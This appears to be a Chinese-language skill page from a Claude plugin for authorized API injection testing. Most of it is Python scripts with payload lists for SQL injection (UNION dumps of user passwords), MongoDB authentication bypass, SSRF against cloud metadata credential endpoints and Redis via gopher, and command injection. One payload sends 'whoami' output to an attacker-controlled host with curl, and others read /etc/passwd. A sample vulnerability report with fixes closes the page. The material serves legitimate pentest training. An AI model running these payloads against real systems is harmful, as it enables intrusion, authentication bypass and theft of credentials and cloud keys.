Tests APIs for injection vulnerabilities like SQLi, NoSQLi, OS command injection, LDAP injection, and SSRF using payloads in parameters, headers, and bodies. Useful for API security audits and input validation checks.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
- 测试接受用户输入用于数据库查询、系统命令或外部请求的 API 端点
Tests APIs for SQL, NoSQL, command, LDAP injection, and SSRF via inputs. Crafts payloads targeting databases and backends for authorized pentesting.
Tests APIs for injection vulnerabilities including SQL, NoSQL, command, LDAP injection, and SSRF via parameters, headers, bodies. Crafts payloads targeting databases like MySQL, PostgreSQL, MongoDB, Redis.
Guides fuzzing REST, SOAP, GraphQL APIs for bug bounties and pentests, covering endpoint recon, auth bypass, IDOR, injections with Burp, Kiterunner, Python.
Share bugs, ideas, or general feedback.
不适用于:未获得书面授权的情况。注入测试可能修改或破坏数据并危害后端系统。
requests 库import requests
import json
import urllib.parse
BASE_URL = "https://target-api.example.com/api/v1"
headers = {"Authorization": "Bearer <token>", "Content-Type": "application/json"}
# 映射 API 中所有输入点
injection_points = [
# 路径参数
{"type": "path", "method": "GET", "url": "/users/{input}"},
{"type": "path", "method": "GET", "url": "/products/{input}"},
{"type": "path", "method": "GET", "url": "/orders/{input}"},
# 查询参数
{"type": "query", "method": "GET", "url": "/users?search={input}"},
{"type": "query", "method": "GET", "url": "/products?sort={input}&order={input}"},
{"type": "query", "method": "GET", "url": "/products?category={input}"},
{"type": "query", "method": "GET", "url": "/search?q={input}"},
# JSON 请求体参数
{"type": "body", "method": "POST", "url": "/auth/login", "fields": ["username", "password"]},
{"type": "body", "method": "POST", "url": "/users", "fields": ["name", "email"]},
{"type": "body", "method": "POST", "url": "/search", "fields": ["query", "filters"]},
{"type": "body", "method": "POST", "url": "/webhook", "fields": ["url", "callback_url"]},
# 请求头参数
{"type": "header", "method": "GET", "url": "/users/me", "headers": ["X-Forwarded-For", "Referer", "User-Agent"]},
]
# 不同上下文的 SQL 注入载荷
SQL_PAYLOADS = {
"detection": [
"'",
"\"",
"' OR '1'='1",
"\" OR \"1\"=\"1",
"1 OR 1=1",
"' OR 1=1--",
"' UNION SELECT NULL--",
"1; WAITFOR DELAY '0:0:5'--",
"1' AND SLEEP(5)--",
"1)) OR 1=1--",
],
"union_based": [
"' UNION SELECT NULL,NULL,NULL--",
"' UNION SELECT 1,2,3--",
"' UNION SELECT username,password,NULL FROM users--",
"-1 UNION SELECT table_name,NULL,NULL FROM information_schema.tables--",
],
"error_based": [
"' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))--",
"' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
],
"time_based": [
"' AND SLEEP(5)--",
"'; WAITFOR DELAY '0:0:5'--",
"' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
"1; SELECT pg_sleep(5)--",
],
}
import time
def test_sql_injection(endpoint, param_name, param_type="query"):
"""测试参数是否存在 SQL 注入。"""
results = []
for category, payloads in SQL_PAYLOADS.items():
for payload in payloads:
start = time.time()
if param_type == "query":
url = f"{BASE_URL}{endpoint}"
resp = requests.get(url, headers=headers,
params={param_name: payload}, timeout=15)
elif param_type == "body":
resp = requests.post(f"{BASE_URL}{endpoint}",
headers=headers,
json={param_name: payload}, timeout=15)
elif param_type == "path":
url = f"{BASE_URL}{endpoint.replace('{input}', urllib.parse.quote(payload))}"
resp = requests.get(url, headers=headers, timeout=15)
elapsed = time.time() - start
# 检查 SQL 注入指标
indicators = {
"error": any(kw in resp.text.lower() for kw in [
"sql syntax", "mysql", "postgresql", "sqlite",
"oracle", "unterminated", "syntax error",
"unexpected end", "quoted string", "invalid input"
]),
"time_based": elapsed > 4.5 and "SLEEP" in payload.upper(),
"union_data": resp.status_code == 200 and len(resp.text) > 0
and "UNION" in payload.upper()
and resp.text != requests.get(f"{BASE_URL}{endpoint}",
headers=headers, params={param_name: "test"}).text,
}
if any(indicators.values()):
triggered = [k for k, v in indicators.items() if v]
results.append({
"endpoint": endpoint,
"param": param_name,
"category": category,
"payload": payload,
"indicators": triggered,
"status": resp.status_code,
"time": f"{elapsed:.1f}s"
})
print(f"[SQLi] {endpoint} ({param_name}): {category} - {triggered}")
return results
# 测试搜索参数
test_sql_injection("/search", "q", "query")
test_sql_injection("/products", "category", "query")
test_sql_injection("/auth/login", "username", "body")
# NoSQL 注入载荷(以 MongoDB 为主)
NOSQL_PAYLOADS = {
"auth_bypass": [
# JSON 请求体中的 MongoDB 操作符注入
{"username": {"$ne": ""}, "password": {"$ne": ""}},
{"username": {"$gt": ""}, "password": {"$gt": ""}},
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}},
{"username": "admin", "password": {"$ne": "wrongpassword"}},
{"username": {"$in": ["admin", "root", "administrator"]}, "password": {"$ne": ""}},
],
"data_extraction": [
{"username": {"$regex": "^a"}, "password": {"$ne": ""}}, # 枚举第一个字符
{"username": {"$where": "this.username.length > 0"}, "password": {"$ne": ""}},
],
"operator_injection_string": [
# 当输入为字符串字段时
'{"$gt": ""}',
'{"$ne": null}',
'{"$regex": ".*"}',
'{"$where": "1==1"}',
],
}
def test_nosql_injection(endpoint, method="POST"):
"""测试 MongoDB NoSQL 注入。"""
results = []
# 测试 JSON 请求体操作符注入
for category, payloads in NOSQL_PAYLOADS.items():
for payload in payloads:
if isinstance(payload, dict):
resp = requests.post(f"{BASE_URL}{endpoint}",
headers=headers, json=payload, timeout=10)
else:
# 作为字符串参数测试
resp = requests.post(f"{BASE_URL}{endpoint}",
headers=headers,
json={"username": json.loads(payload), "password": "test"},
timeout=10)
if resp.status_code == 200:
resp_data = resp.json() if resp.text else {}
if "token" in str(resp_data) or "user" in str(resp_data):
results.append({
"endpoint": endpoint,
"category": category,
"payload": str(payload)[:100],
"authenticated": True,
"response": str(resp_data)[:200]
})
print(f"[NoSQLi] {endpoint}: {category} - 认证绕过成功")
return results
nosql_results = test_nosql_injection("/auth/login")
# 针对内部服务的 SSRF 载荷
SSRF_PAYLOADS = {
"cloud_metadata": [
"http://169.254.169.254/latest/meta-data/", # AWS IMDS
"http://169.254.169.254/latest/meta-data/iam/security-credentials/", # AWS IAM 凭据
"http://metadata.google.internal/computeMetadata/v1/", # GCP
"http://169.254.169.254/metadata/instance?api-version=2021-02-01", # Azure
],
"internal_services": [
"http://localhost:8080/",
"http://127.0.0.1:6379/", # Redis
"http://127.0.0.1:9200/", # Elasticsearch
"http://127.0.0.1:27017/", # MongoDB
"http://internal-api.local:8080/",
"http://10.0.0.1/admin/",
],
"protocol_smuggling": [
"gopher://127.0.0.1:6379/_SET%20pwned%20true",
"file:///etc/passwd",
"dict://127.0.0.1:6379/INFO",
],
"bypass_filters": [
"http://0x7f000001/", # 127.0.0.1 的十六进制 IP
"http://2130706433/", # 127.0.0.1 的十进制 IP
"http://0177.0.0.1/", # 八进制
"http://127.0.0.1.nip.io/", # DNS 重绑定
"http://[::1]/", # IPv6 本地地址
"http://127.1/", # 缩写 IP
"http://0/", # 零
],
}
def test_ssrf(endpoint, url_param, method="POST"):
"""测试接受 URL 参数中的 SSRF 漏洞。"""
results = []
for category, payloads in SSRF_PAYLOADS.items():
for payload in payloads:
try:
if method == "POST":
resp = requests.post(f"{BASE_URL}{endpoint}",
headers=headers,
json={url_param: payload}, timeout=10)
else:
resp = requests.get(f"{BASE_URL}{endpoint}",
headers=headers,
params={url_param: payload}, timeout=10)
# 检查 SSRF 指标
if resp.status_code == 200 and len(resp.text) > 50:
# 检查云元数据
if any(kw in resp.text for kw in ["ami-id", "instance-id",
"iam", "AccessKeyId",
"root:x:", "computeMetadata"]):
results.append({
"endpoint": endpoint,
"category": category,
"payload": payload,
"severity": "critical",
"data": resp.text[:300]
})
print(f"[SSRF-严重] {endpoint}: {category} - {payload}")
else:
results.append({
"endpoint": endpoint,
"category": category,
"payload": payload,
"severity": "high",
"data": resp.text[:100]
})
print(f"[SSRF] {endpoint}: {category} - {payload} -> {resp.status_code}")
except requests.exceptions.RequestException:
pass
return results
# 测试接受 URL 的端点
ssrf_results = test_ssrf("/webhook/test", "url")
ssrf_results.extend(test_ssrf("/import", "source_url"))
ssrf_results.extend(test_ssrf("/proxy", "target", "GET"))
# 命令注入载荷
CMD_PAYLOADS = {
"detection": [
"; sleep 5",
"| sleep 5",
"` sleep 5 `",
"$( sleep 5 )",
"\n sleep 5",
"& ping -c 5 127.0.0.1 &",
],
"data_exfil": [
"; cat /etc/passwd",
"| id",
"`whoami`",
"$(uname -a)",
"; curl http://attacker-controlled-server.com/$(whoami)",
],
"windows": [
"& ping -n 5 127.0.0.1 &",
"| dir",
"; type C:\\Windows\\System32\\drivers\\etc\\hosts",
"& timeout /t 5 &",
],
}
def test_command_injection(endpoint, param_name, param_type="body"):
"""测试操作系统命令注入。"""
results = []
for category, payloads in CMD_PAYLOADS.items():
for payload in payloads:
start = time.time()
prefixed_payload = f"validvalue{payload}"
if param_type == "body":
resp = requests.post(f"{BASE_URL}{endpoint}",
headers=headers,
json={param_name: prefixed_payload}, timeout=15)
else:
resp = requests.get(f"{BASE_URL}{endpoint}",
headers=headers,
params={param_name: prefixed_payload}, timeout=15)
elapsed = time.time() - start
indicators = {
"time_based": elapsed > 4.5 and "sleep" in payload.lower(),
"output": any(kw in resp.text for kw in [
"root:", "uid=", "Linux", "Windows", "bin/bash",
"Directory of", "Volume Serial"
]),
}
if any(indicators.values()):
results.append({
"endpoint": endpoint,
"param": param_name,
"category": category,
"payload": payload,
"indicators": [k for k, v in indicators.items() if v],
})
print(f"[命令注入] {endpoint} ({param_name}): {payload}")
return results
# 测试文件处理和系统交互端点
test_command_injection("/export", "filename")
test_command_injection("/convert", "input_file")
test_command_injection("/ping", "host", "query")
| 术语 | 定义 |
|---|---|
| SQL 注入(SQL Injection) | 将 SQL 代码插入被拼接到数据库查询中的 API 参数,实现数据提取或修改 |
| NoSQL 注入(NoSQL Injection) | 将 NoSQL 操作符($ne、$gt、$regex)注入 MongoDB 查询,或通过 API 参数操纵 Redis/Elasticsearch 查询 |
| SSRF | 服务端请求伪造(OWASP API7:2023)- 强迫服务器向攻击者指定的目标(包括内部服务)发出 HTTP 请求 |
| 命令注入(Command Injection) | 通过传递给 Shell 执行函数(exec、system、popen)的 API 参数注入操作系统命令 |
| 参数化查询(Parameterized Queries) | 使用带绑定参数的预编译语句,通过将代码与数据分离来防止 SQL 注入 |
| 输入验证(Input Validation) | 在处理前,服务器端验证用户输入是否符合预期格式、类型、长度和字符集 |
场景背景:某电商 API 使用 PostgreSQL 存储商品目录,MongoDB 存储用户会话,并接受 webhook URL 用于订单通知。API 使用 Node.js/Express 构建。
方法:
GET /api/v1/products?search=test - 发现基于错误的 SQL 注入,泄露 PostgreSQL 14 后端信息users 表转储用户凭据{"username":{"$ne":""},"password":{"$ne":""}} 绕过认证POST /api/v1/webhooks {"url":"http://169.254.169.254/latest/meta-data/"} 返回 AWS 实例元数据GET /api/v1/export?filename=report;cat /etc/passwd 返回 passwd 文件内容常见陷阱:
## 发现:商品搜索 API 中的 SQL 注入允许完全数据库访问
**ID**: API-INJ-001
**严重性**: 严重(CVSS 9.8)
**OWASP API**: API8:2023 - 安全错误配置 / 注入
**受影响端点**:
- GET /api/v1/products?search= (SQL 注入)
- POST /api/v1/auth/login (NoSQL 注入)
- POST /api/v1/webhooks (SSRF)
**描述**:
商品搜索 API 在未使用参数化的情况下,将用户输入直接拼接到
PostgreSQL 查询中。攻击者可以提取所有数据库内容,包括用户凭据、
支付信息和管理员密钥。此外,登录端点存在 MongoDB NoSQL 操作符
注入漏洞,webhook 端点允许 SSRF 访问内部服务和云元数据。
**影响**:
- 通过 SQL 注入实现完全数据库读写访问
- 通过 NoSQL 操作符注入绕过认证
- 通过 SSRF 访问实例元数据窃取 AWS IAM 凭据
- 通过 SQL 注入堆叠查询实现潜在远程代码执行
**修复建议**:
1. 对所有数据库操作使用参数化查询
2. 验证并清理 JSON 输入中的 NoSQL 操作符字符
3. 对 webhook 和回调 URL 实施 URL 白名单
4. 从应用服务器封锁对云元数据端点(169.254.169.254)的访问
5. 使用带参数化查询的 ORM,禁用原始查询方法
6. 实施 WAF 规则用于常见注入模式的纵深防御